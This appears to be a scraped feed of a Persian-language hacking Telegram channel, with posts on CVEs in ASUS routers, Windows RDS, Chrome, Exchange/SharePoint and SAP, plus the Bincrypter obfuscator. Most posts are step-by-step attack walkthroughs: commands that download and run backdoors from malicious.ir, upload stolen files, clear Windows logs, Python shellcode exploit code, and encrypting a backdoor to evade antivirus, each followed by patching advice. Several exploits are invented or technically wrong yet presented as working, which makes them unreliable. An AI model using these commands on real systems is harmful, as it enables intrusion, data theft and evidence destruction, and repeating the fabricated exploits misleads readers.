کن: برو به SAP Support Portal (support.sap.com) و آخرین پچ رو برای NetWeaver دانلود کن. یا تو سرور: sapcontrol -nr 00 -function UpdateSystem حتما Metadata Uploader رو محدود کن: اگه از Visual Composer استفاده نمی‌کنی، کامل غیرفعالش کن: تو تنظیمات SAP: /nrz0 → Disable Visual Composer کامپوننت آسیب‌پذیر: MetadataUploader در مسیر: /developmentserver/metadatauploader رو ببند: # تو فایروال سرور: Deny /developmentserver/metadatauploader فایلای حساس رو رمزنگاری کن: دیتای حساس (مثلاً دیتابیس تراکنشا) رو با AES-256 رمزنگاری کن: openssl enc -aes-256-cbc -salt -in transactions.db -out transactions.db.enc برای اطلاعات بیشتر: ReliaQuest: reliaquest.com (web:1) The Hacker News: thehackernews.com (web:0) ------------------------------------------ @hackhive_channel 🐝 ------------------------------------------
683
14
به هر فصلی غمی هر صفحه ای انبوه اندوهی وطن جان خسته ام، پایان خوب داستانت کو ؟ - حسين جنتی @hackhive_channel 🖤
به هر فصلی غمی هر صفحه ای انبوه اندوهی وطن جان خسته ام، پایان خوب داستانت کو ؟ - حسين جنتی @hackhive_channel 🖤
662
15
🚨 روترای ASUS AiCloud هک شدن! 📡 📢 یه باگ خطرناک تو روترای ASUS با قابلیت AiCloud پیدا شده که به هکرا اجازه می‌دن بدون رمز، روترتو هک کنن و هر کاری دلشون می‌خواد بکنن! این باگ با کد CVE-2025-2492 شناخته می‌شه و امتیاز CVSS 9.2 داره (یعنی خیلی خطرناکه!). فکر کن روتر شرکتت هک بشه و هکر همه دیتاهاتو بدزده 🕵️‍♂️ ماجرا چیه؟ ایسوس یه نقص امنیتی تو AiCloud روتراش شناسایی کرده که به هکرا اجازه می‌ده از راه دور، بدون احراز هویت، توابع غیرمجاز رو اجرا کنن. جزئیاتش اینه: شناسه باگ: CVE-2025-2492 امتیاز CVSS: 9.2 از 10 (یعنی بحرانی!) مشکل: یه نقص تو کنترل احراز هویت که با یه درخواست دستکاری‌شده (crafted request) فعال می‌شه. تاثیر: هکر می‌تونه دستورات دلخواهشو روی روتر اجرا کنه، مثلاً دیتای شبکه‌تو بدزده یا یه بک‌دور نصب کنه. طبق وب‌سرچ (web:1)، این باگ تو روترایی که AiCloud فعال دارن خطرناکه و ایسوس توصیه کرده سریع روتراتونو به آخرین نسخه فریمور آپدیت کنین. تو ایران که خیلیا از روترای ASUS برای شبکه خونگی یا شرکتاشون (مثلاً کافی‌نتا یا استارتاپا) استفاده می‌کنن، این باگ می‌تونه فاجعه درست کنه! 🔹 سناریوی : هک روتر یه کافی‌نت تو تهران! فرض کن تو یه کافی‌نت تو تهران (مثلاً کافی‌نت پارس) داری کار می‌کنی و روترت یه ASUS RT-AC68U با AiCloud فعاله. یه هکر اینجوری روترتو هک می‌کنه: قدم ۱: پیدا کردن روتر آسیب‌پذیر هکر با یه اسکن ساده روترایی که AiCloud فعال دارن رو پیدا می‌کنه: shodan search "port:443 ASUS AiCloud" این روترای ASUS با پورت 443 باز (برای AiCloud) رو پیدا می‌کنه، مثلاً IP کافی‌نتت: 192.168.1.1. قدم ۲: سوءاستفاده از CVE-2025-2492 هکر یه درخواست دستکاری‌شده می‌فرسته تا احراز هویت رو دور بزنه و کد دلخواهشو اجرا کنه: import requests target = "https://192.168.1.1:443" exploit_url = f"{target}/aicloud/auth_bypass?cmd=exec&arg=/bin/sh%20-c%20'whoami'" # ارسال درخواست مخرب response = requests.get(exploit_url, verify=False) if "admin" in response.text.lower(): print("Exploit Worked! Got admin access.") else: print("Exploit Failed.") این کد دستور whoami رو روی روتر اجرا می‌کنه و هکر می‌فهمه که دسترسی ادمین داره! قدم ۳: نصب بک‌دور و سرقت دیتا حالا که هکر دسترسی داره، یه بک‌دور نصب می‌کنه تا همیشه بتونه برگرده: curl -X POST "https://192.168.1.1:443/aicloud/exec" -d "cmd=/bin/sh -c 'wget http://malicious.ir/backdoor.sh -O /tmp/backdoor.sh; chmod +x /tmp/backdoor.sh; /tmp/backdoor.sh'" این یه بک‌دور رو تو روتر نصب می‌کنه و هکر می‌تونه: همه ترافیک شبکه (مثلاً رمزای وای‌فای مشتریای کافی‌نت) رو شنود کنه. به فایلای اشتراکی تو AiCloud (مثلاً فایلای مشتریا) دسترسی پیدا کنه: curl "https://192.168.1.1:443/aicloud/download?file=/shared/customers.txt" -o stolen.txt curl -F "file=@stolen.txt" http://malicious.ir/upload قدم ۴: خرابکاری و فرار هکر برای خرابکاری، روترتو ری‌استارت می‌کنه یا تنظیماتشو به هم می‌ریزه: curl -X POST "https://192.168.1.1:443/aicloud/exec" -d "cmd=/sbin/reboot" بعد ردشو پاک می‌کنه تا ردیابی نشه: curl -X POST "https://192.168.1.1:443/aicloud/exec" -d "cmd=rm -f /tmp/backdoor.sh" نتیجه: هکر دیتای مشتریای کافی‌نتت رو دزدیده، شبکه‌تو خراب کرده، و تو موندی با یه روتر هک‌شده و مشتریایی که دیگه بهت اعتماد ندارن! 🛡️ چطور روترتو از هک نجات بدی؟ برای اینکه روتر ASUSت هک نشه: فوری آپدیت کن: ایسوس تو آوریل ۲۰۲۵ یه فریمور جدید منتشر کرده که این باگ رو فیکس می‌کنه (طبق web:1). برو سایت ایسوس (asus.com) یا تو تنظیمات روترت فریمور رو آپدیت کن: تو مرورگر برو به 192.168.1.1 → Administration → Firmware Upgrade → آپدیت کن. حتما AiCloud رو غیرفعال کن: اگه بهش نیاز نداری، خاموشش کن: تو تنظیمات روتر AiCloud → Disable. پورتای اضافی رو ببند: پورت 443 (برای AiCloud) رو فقط برای IPای مطمئن باز کن: # تو تنظیمات فایروال روتر: Allow Port 443 from 192.168.1.0/24 Deny Port 443 from all دسترسی WAN رو غیرفعال کن: دسترسی از اینترنت به روترت رو ببند: تو تنظیمات روتر WAN → Enable WAN Access → No. رمز قوی بذار: رمز پیش‌فرض روترت رو عوض کن: رمز ادمین رو بذار یه چیز قوی (مثلاً P@ssw0rd123!). ترافیک رو مانیتور کن: از ابزارایی مثل Wireshark برای رصد ترافیک مشکوک استفاده کن: sudo wireshark -i eth0 -f "port 443" برای اطلاعات بیشتر: asus.com/support ------------------------- @hackhive_channel 🐝 -------------------------
725
16
📊 پیش بینی rapid7 از تکنیکایی که تو حمله این گروه از تحلیل بالا
📊 پیش بینی rapid7 از تکنیکایی که تو حمله این گروه از تحلیل بالا
646
17
🚨 گروه APT29 با Exchange و SharePoint بانکا رو داره می‌بره 🖥️ 📢 گروه APT29 (همون Cozy Bear معروف که به روسیه نسبت داده می‌شه) با یه حمله دو مرحله‌ای داره سرورای Exchange و SharePoint مایکروسافت رو هک می‌کنه و دیتای شرکتا رو می‌دزده! 🕵️‍♂️ ماجرا چیه؟ یه کمپین شناسایی‌شده نشون داده که گروه APT29 با دو روش کلاسیک ولی خطرناک نفوذ می‌کنه: از Microsoft Exchange برای دسترسی اولیه با یه یوزر سطح پایین ولی PowerShell-enabled. از Microsoft SharePoint برای بالا بردن دسترسی، نفوذ عمیق‌تر، و سرقت دیتا. این حمله تو دو فاز انجام شده: اول از Exchange شروع کردن، بعد که پچ اومد، رفتن سراغ SharePoint و با یه سری CVE زنجیره‌ای کارشونو ادامه دادن. 🧨 فاز اول – نفوذ از طریق Microsoft Exchange: 📍 هدف: دسترسی اولیه (Initial Access) 📍 باگ مورد استفاده: SSRF یا باگای pre-auth مثل ProxyShell 📍 نتیجه: دسترسی به توکنی که یوزری با نقش PowerShell Admin داره (به‌خاطر misconfiguration تو setup) 💡 نکته امنیتی: توی Exchange، خیلی وقتا یوزر سطح پایین عضو گروه‌هایی مثل Organization Management یا View-Only Admin هست که بهش PowerShell Remoting می‌ده! 📥 مهاجم از همین راه، کد رو به‌صورت remote اجرا می‌کنه: Invoke-Command -ConfigurationName Microsoft.Exchange -ScriptBlock { Get-Mailbox } -ComputerName exchange.bankmelli.ir 📌 تکنیک‌ها: T1190 – Exploit Public-Facing Application T1059.001 – PowerShell T1078 – Valid Accounts (با توکن یوزر) ⚔️ فاز دوم – حمله کامل به SharePoint 📍 بعد از اینکه Exchange پچ شد، مهاجم کمپین رو برد به SharePoint. 📍 مجموعه CVEهایی که استفاده کردن: CVE-2023-28334: Auth bypass → Remote Code Execution CVE-2023-26995: Input validation bypass → info leak CVE-2019-0604: یکی از RCE محبوب APTها، هنوزم کاربرد داره CVE-2024-38094: تازه‌ترین RCE شناسایی‌شده روی endpointهای SharePoint CVE-2024-38024 و CVE-2024-38023: آسیب‌پذیری‌های زنجیره‌ای در chain exploitation 📥 اجرای RCE بعد از bypass: Invoke-WebRequest -Uri "https://sharepoint.bankmelli.ir/_layouts/15/Pages/PoC.aspx" -Method POST -Body "<SerializedObject/>" 📌 تکنیک‌ها: T1190 – Exploit Public-Facing Application T1068 – Privilege Escalation T1047 – Windows Management Instrumentation 💡 چیزایی که تو یه حمله واقعی دیدن 📁 مسیر فایل‌های استخراج‌شده: C:\inetpub\wwwroot_layouts\PoC.aspx C:\Program Files\SharePoint\Backup\HR_data.xlsx C:\Users\Public\Documents\creds.xml 🔌 ارتباط C2: با دامنه *.frp[.]cn 🧪 AMSI bypass: با روش classic string obfuscation 🛠 ابزارای lateral: مثل PsExec، WMIC، و Rubeus 🛡️ چطور جلوی APT29 رو بگیری؟ برای اینکه سرورای بانک ملی یا شرکتت هک نشه: ✅ فوراً patchای آوریل ۲۰۲۵ رو روی Exchange و SharePoint نصب کن. ✅ اکانت‌هایی با PowerShell Admin حتماً تحت least privilege باشن. ✅ ترافیک خروجی FRP، WMI، و PsExec رو مانیتور کن. ✅ اجرای ابزارایی مثل everything.exe، frpc.exe، و nxc.exe رو بلاک کن. ✅ حتما AMSI و Defender رو با پالیسی اجباری فعال نگه دار. ✅ از EDR با قابلیت شکار رفتار lateral و C2 استفاده کن. 🔗 منبع و اطلاعات بیشتر 🔗 Rapid7 IR – SharePoint Compromise 🔗 MITRE ATT&CK Framework 🔗 Microsoft Patch Guidance April 2025 -------------------------------------------- @hackhive_channel 🐝 --------------------------------------------
712
18
🚨 باگای RDS ویندوز بدون رمز هکت می‌کنن، سریع آپدیت کن! 🖥️ 📢 دو تا باگ خطرناک تو Windows Remote Desktop Services (RDS) با کدای CVE-2025-27480 و CVE-2025-27482 پیدا شده که به هکرا اجازه می‌دن بدون نیاز به رمز، کد دلخواهشون رو روی سیستمت اجرا کنن! 🕵️‍♂️ ماجرا چیه؟ این دو باگ (CVE-2025-27480 و CVE-2025-27482) یه جفت آسیب‌پذیری Remote Code Execution (RCE) تو سرویس‌های Windows Remote Desktop (RDS) هستن که: بدون احراز هویت کار می‌کنن، یعنی هکر نیازی به رمز یا دسترسی اولیه نداره! یه مشکل use-after-free تو Remote Desktop Gateway Serviceئه که با یه race condition ترکیب می‌شه تا سندباکس رو دور بزنه. تو وب‌سرچ (web:0 و web:2) مشخص شده که این باگا تو ویندوز سرورهایی که نقش RD Gateway دارن، خطرناکن و می‌تونن به هکر اجازه بدن کد دلخواهشو اجرا کنه. تو ایران که خیلی از شرکتا از RDS برای دورکاری کارمنداشون استفاده می‌کنن، این باگا می‌تونن یه فاجعه درست کنن! مثلاً سرور یه شرکت مثل زرین‌پال با این باگ هک بشه، هکر می‌تونه کل شبکه رو کنترل کنه! 🔹 یه تیکه کد خطرناک (فرضی) هکرا با یه پیلود ساده می‌تونن این باگا رو اکسپلویت کنن: import socket import struct def exploit_rds(target, port=3389): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target, port)) #ساخت پیلود مخرب برای CVE-2025-27480 payload = b"\x00" * 16 # هدر RDP payload += struct.pack("<I", 0xDEADBEEF) # Use-after-free trigger payload += b"\x90" * 100 # NOP sled payload += b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" # Shellcode برای باز کردن شل sock.send(payload) print("Exploit sent! Trying to get shell...") sock.close() exploit_rds("rdp.company.ir", 3389) این کد با سوءاستفاده از باگ CVE-2025-27480، یه شل روی سرور باز می‌کنه! هکر می‌تونه جاش دستورای خطرناک‌تر (مثلاً سرقت دیتا) بذاره! 🔹 مرحله ۱: اتصال به سرور بدون احراز هویت هکر با سوءاستفاده از CVE-2025-27480 و CVE-2025-27482، بدون نیاز به رمز به سرور RDS وصل می‌شه: -اسکن سرور: nmap -p 3389 --script rdp-enum-encryption rdp.company.ir این سرورایی که RDS فعال دارن رو پیدا می‌کنه. 🔹 مرحله ۲: اجرای کد از راه دور (RCE) بعد از اتصال، هکر کد مخربشو اجرا می‌کنه: سرقت اطلاعات: Invoke-WebRequest -Uri "http://malicious.ir/steal" -OutFile "C:\Temp\steal.ps1" powershell -ExecutionPolicy Bypass -File "C:\Temp\steal.ps1" این یه اسکریپت مخرب رو روی سرور اجرا می‌کنه و دیتا رو می‌دزده. نصب بدافزار: Invoke-WebRequest -Uri "http://malicious.ir/backdoor.exe" -OutFile "C:\Windows\Temp\backdoor.exe" Start-Process "C:\Windows\Temp\backdoor.exe" این یه بک‌دور رو روی سرور نصب می‌کنه. 🔹 مرحله ۳: پاک کردن ردپا هکر ردشو پاک می‌کنه تا ردیابی نشه: حذف لاگ‌ها: Remove-Item -Path "C:\Windows\Temp\backdoor.exe" -Forcewevtutil cl Security این فایلای مخرب و لاگای ویندوز رو پاک می‌کنه. 🛡️ راهکارای دفاعی برای اینکه هکرا با این باگا سرورتو نابود نکنن: فوری آپدیت کن: مایکروسافت تو آوریل ۲۰۲۵ پچ این باگا رو منتشر کرده (طبق web:2). ویندوزت رو آپدیت کن: Install-WindowsUpdate -AcceptAll -AutoReboot حتما RDS رو غیرفعال کن: اگه به RDS نیاز نداری، غیرفعالش کن: Disable-WindowsOptionalFeature -Online -FeatureName RemoteDesktopServices پورت 3389 رو ببند: پورت پیش‌فرض RDP (3389) رو فقط برای IPای مطمئن باز کن: New-NetFirewallRule -DisplayName "Allow RDP from Trusted IPs" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow -RemoteAddress 192.168.1.0/24 New-NetFirewallRule -DisplayName "Block RDP" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Block مانیتورینگ فعال کن: از ابزارایی مثل Sysmon برای رصد فعالیتای مشکوک روی سرور استفاده کن: sysmon -i sysmonconfig.xml حتما VPN بذار: برای دسترسی به RDS، حتماً از VPN استفاده کن تا سرور مستقیم به اینترنت وصل نباشه: openvpn --config company-vpn.ovpn 🔗 منبع و اطلاعات بیشتر برای اطلاعات بیشتر درباره این باگا: helpnetsecurity.com NVD: nvd.nist.gov/vuln/detail/CVE-2025-27480 -------------------------------------------- @hackhive_channel🐝 -------------------------------------------- #ویندوز #RDS #هک #HackHive #CyberSecurity
608
19
🔐 با Bincrypter هکرا رو قفل کن! 🐧 📢 یه ابزار لینوکسی به اسم Bincrypter تو BASH نوشته شده که باینری‌ها و اسکریپتاتو رمزنگاری و مخفی می‌کنه تا هکرا نتونن بهشون دست بزنن! فکر کن یه بدافزار بخواد رو سرور یه شرکت ایرانی اجرا بشه، ولی با Bincrypter قفلش کردی و هکرا هنگ کردن... چه کیفی می‌ده! 😂 تو این پست این ابزار رو باز می‌کنیم و می‌گیم چطور ازش استفاده کنی. 🕵️‍♂️اصلا Bincrypter چیه؟ ابزار Bincrypter یه ابزار خفن تو لینوکسه که تو BASH نوشته شده و کارش اینه که ELF باینری‌ها (فایلای اجرایی لینوکس) و اسکریپتای شل (#!) رو رمزنگاری و مخفی کنه. این ابزار می‌تونه: باینریاتو قفل کنه که فقط رو سیستم خاصی اجرا بشن (Lock to Target System). کد رو Obfuscate کنه تا آنتی‌ویروسا و EDRها نتونن تشخیصش بدن (AV/EDR Evasion). با رمزنگاری چندلایه (Double/Triple Encryption) امنیتشو ببره بالا. تو حافظه کار کنه (In-Memory) و هیچ ردپایی رو دیسک نذاره! این ابزار تو GitHub توسط گروه hackerschoice منتشر شده (لینک: https://github.com/hackerschoice/bincrypter) و برای هکرای کلاه‌سفید (یا حتی کلاه‌سیاها!) حسابی کاربردیه. تو ایران که سرورای لینوکسی زیاده (مثلاً سرورای وب یا شرکتای مخابراتی) این ابزار می‌تونه یه سلاح خفن برای امن کردن باینریا باشه 🔹 یه سناریوی باحال فرض کن تو ادمین یه سرور لینوکسی تو یه شرکت ایرانی (مثلاً همراه اول) هستی. یه اسکریپت مهم داری که اطلاعات مشتریا رو پردازش می‌کنه، ولی می‌ترسی هکرا پیداش کنن و بدزدنش. با Bincrypter می‌تونی اسکریپتتو رمزنگاری کنی، قفلش کنی به سرورت (که جای دیگه اجرا نشه)، و خیالت راحت باشه که آنتی‌ویروسا یا هکرا نمی‌تونن بهش دست بزنن! 🔹 چطور از Bincrypter استفاده کنیم؟ بیایم یه مثال عملی بزنیم که چطور یه باینری رو با Bincrypter رمزنگاری کنیم. ۱. دانلود و نصب Bincrypter اول ابزار رو از GitHub دانلود می‌کنیم: curl -SsfL https://github.com/hackerschoice/bincrypter/raw/refs/heads/main/bincrypter.sh -o bincrypter.sh chmod +x bincrypter.sh ۲. رمزنگاری یه باینری (مثلاً id) یه باینری ساده (مثلاً /usr/bin/id) رو رمزنگاری می‌کنیم: cp /usr/bin/id id ./bincrypter.sh id این دستور باینری id رو رمزنگاری می‌کنه و یه نسخه قفل‌شده تولید می‌کنه. ۳. رمزنگاری با پسورد دلخواه می‌تونی یه پسورد هم بذاری تا فقط با پسورد اجرا بشه: cp /usr/bin/id id ./bincrypter.sh id mySecretPass123 حالا باینری فقط با پسورد mySecretPass123 اجرا می‌شه! ۴. تست اجرا باینری رمزنگاری‌شده رو اجرا کن: ./id اگه پسورد گذاشتی، باید وارد کنی اگه رو سیستم دیگه اجرا کنی، کار نمی‌کنه چون به سیستمت قفل شده! 😏 ۵. یه مثال پیشرفته (نصب بک‌دور امن) یه بک‌دور (مثلاً gs-netcat) رو رمزنگاری می‌کنیم تا فقط رو سرور خودمون کار کنه: curl -SsfL "https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)" -o gsnc PASSWORD="securePass2025" ./bincrypter.sh gsnc chmod +x gsnc PASSWORD="securePass2025" GS_ARGS="-ilD -s ChangeMe" ./gsnc این یه بک‌دور رمزنگاری‌شده می‌سازه که فقط با پسورد و تو سیستمت اجرا می‌شه! 🔹 یه مثال خطرناک (برای کلاه‌سیاها!) هکرا می‌تونن از Bincrypter برای مخفی کردن بدافزاراشون استفاده کنن: - رمزنگاری یه بدافزار: curl -SsfL "https://malicious.ir/backdoor" -o backdoor ./bincrypter.sh backdoor evilPass666 این یه بدافزار رو رمزنگاری می‌کنه و قفلش می‌کنه. اجرا تو سرور قربانی: هکر بدافزار رمزنگاری‌شده رو رو سرور قربانی (مثلاً سرور یه شرکت ایرانی) آپلود می‌کنه و با پسورد اجراش می‌کنه. چون تو حافظه کار می‌کنه، هیچ ردپایی رو دیسک نمی‌ذاره و آنتی‌ویروسا نمی‌تونن تشخیصش بدن! 🔗 منبع و اطلاعات بیشتر برای اطلاعات بیشتر درباره Bincrypter: https://github.com/hackerschoice/bincrypter kalilinuxtutorials.com -------------------------------------------- @hackhive_channel 🐝 -------------------------------------------- #هک_هایو #امنیت_سایبری #لینوکس #Bincrypter #هک #HackHive #CyberSecurity توجه: این پست فقط برای آموزشه. سوءاستفاده از این اطلاعات غیرقانونیه و عواقب داره. همیشه کلاه‌سفید باش! 😇
495
20
🔴 باگ کروم که روسیه رو نابود کرد! 📢 یه باگ خطرناک تو مرورگر کروم (CVE-2025-2783) پیدا شده که از ژانویه ۲۰۲۵ تو حملات هدفمند تو روسیه اکسپلویت شده! هکرا با این باگ می‌تونن مرورگرت رو هک کنن و هر کدی که می‌خوان رو روی سیستمت اجرا کنن. فکر کن تو ایران با کروم داری سایت بانک ملت رو باز می‌کنی و یهو حسابت خالی می‌شه. 🕵️‍♂️ ماجرا چیه؟ این باگ (CVE-2025-2783) یه مشکل logical error تو تقاطع کروم و سیستم‌عامل ویندوزه که به هکرا اجازه می‌ده سندباکس کروم رو دور بزنن (همون لایه امنیتی که جلوی هک رو می‌گیره). این باگ از ژانویه ۲۰۲۵ تو حملات واقعی اکسپلویت شده و: هدف‌ها: رسانه‌ها، مؤسسات آموزشی، و سازمان‌های دولتی تو روسیه. روش حمله: ایمیلای فیشینگ که کاربرا رو فریب می‌دن تا یه لینک مخرب رو باز کنن. خطر اصلی: این باگ با یه اکسپلویت دیگه ترکیب می‌شه تا اجرای کد از راه دور (RCE) رو ممکن کنه. گوگل یه آپدیت اضطراری (ورژن 134.0.6998.178) منتشر کرده که این باگ رو فیکس می‌کنه. تو ایران که همه با کروم کار می‌کنن (مثلاً برای سایتای بانکی یا خرید آنلاین)، این باگ می‌تونه یه فاجعه درست کنه! 😳 🔹 یه سناریوی ترسناک فرض کن تو یه کافی‌نت تو تهران با کروم داری سایت بانک ملت رو باز می‌کنی. یه ایمیل فیشینگ می‌گیری که نوشته: کاربر گرامی، برای امنیت حساب شما، لطفاً روی لینک زیر کلیک کنید: http://bankmelli-fake.ir/update با احترام، بانک ملت تو روی لینک کلیک می‌کنی، و بوم! هکر با CVE-2025-2783 سندباکس کروم رو دور می‌زنه، یه کد مخرب رو روی سیستمت اجرا می‌کنه، و حسابت خالی می‌شه! 😅 🔹 یه تیکه کد خطرناک (فرضی) هکرا با یه پیلود ساده می‌تونن از این باگ سوءاستفاده کنن: // پیلود مخرب برای دور زدن سندباکس const maliciousPayload = { mojoHandle: new ArrayBuffer(0x1000), exploit: () => { // سوءاستفاده از خطای منطقی Mojo fetch("http://malicious.ir/exploit", { method: "POST", body: "cmd=whoami" }).then(res => res.text()).then(data => { console.log("Exploit Result: " + data); }); } }; maliciousPayload.exploit(); این کد با سوءاستفاده از باگ Mojo تو کروم، یه درخواست مخرب می‌فرسته و دستور whoami رو اجرا می‌کنه. هکر می‌تونه جاش دستورای خطرناک‌تر (مثلاً دزدیدن رمزا) بذاره! 🔹 مرحله ۱: فیشینگ برای نفوذ اولیه هکرا با یه ایمیل فیشینگ کاربرا رو فریب می‌دن: سلام، شما برنده ۵۰ میلیون تومن از بانک ملت شدید! برای دریافت جایزه، روی لینک زیر کلیک کنید: http://bankmelli-fake.ir/prize کاربر روی لینک کلیک می‌کنه و یه صفحه جعلی باز می‌شه که باگ CVE-2025-2783 رو اکسپلویت می‌کنه. 🔹 مرحله ۲: اجرای کد از راه دور (RCE) بعد از دور زدن سندباکس، هکر کد مخربشو اجرا می‌کنه: - سرقت اطلاعات: curl -X POST http://malicious.ir/steal -d "data=$(cat %USERPROFILE%\passwords.txt)" این فایل رمزای ذخیره‌شده تو سیستمت رو می‌دزده و برای هکر می‌فرسته. نصب بدافزار: Invoke-WebRequest -Uri "http://malicious.ir/backdoor.exe" -OutFile "C:\Users\Public\backdoor.exe" Start-Process "C:\Users\Public\backdoor.exe" این یه بک‌دور رو روی سیستمت نصب می‌کنه. 🔹 مرحله ۳: پاک کردن ردپا هکر ردشو پاک می‌کنه تا ردیابی نشه: حذف لاگ‌ها: Remove-Item -Path "C:\Users\Public\backdoor.exe" -Force wevtutil cl Security این فایلای مخرب و لاگای ویندوز رو پاک می‌کنه. 🛡️ راهکارای دفاعی برای اینکه هکرا با این باگ کرومتو هک نکنن: فوری آپدیت کن: گوگل کروم ورژن 134.0.6998.178 رو منتشر کرده که این باگ رو فیکس می‌کنه. برو آپدیت کن: تو کروم، برو Menu > Help > About Google Chrome و آپدیت رو نصب کن. یا مستقیم از سایت گوگل (google.com/chrome) دانلود کن. ایمیلای مشکوک رو باز نکن: اگه ایمیلی از بانک یا سایتای ایرانی (مثلاً دیجی‌کالا) اومد که لینک داره، مستقیم بهشون زنگ بزن و چک کن. آنتی‌ویروس قوی بذار: یه آنتی‌ویروس آپدیت‌شده (مثلاً ESET یا Windows Defender) می‌تونه بدافزارای احتمالی رو گیر بندازه. لینکا رو چک کن: قبل از کلیک روی لینک، با موس روش برو و URL واقعی رو ببین (مثلاً bankmelli-fake.ir مشکوکه!). سندباکس اضافی: اگه کار حساسی (مثلاً تراکنش بانکی) داری، از یه مرورگر جدا تو یه ماشین مجازی (مثلاً VirtualBox) استفاده کن. 🔗 منبع و اطلاعات بیشتر helpnetsecurity.com 👉 توضیحات CVE تو NVD nvd.nist.gov/vuln/detail/CVE-2025-2783 -------------------------------------------- @hackhive_channel 🐝 --------------------------------------------
631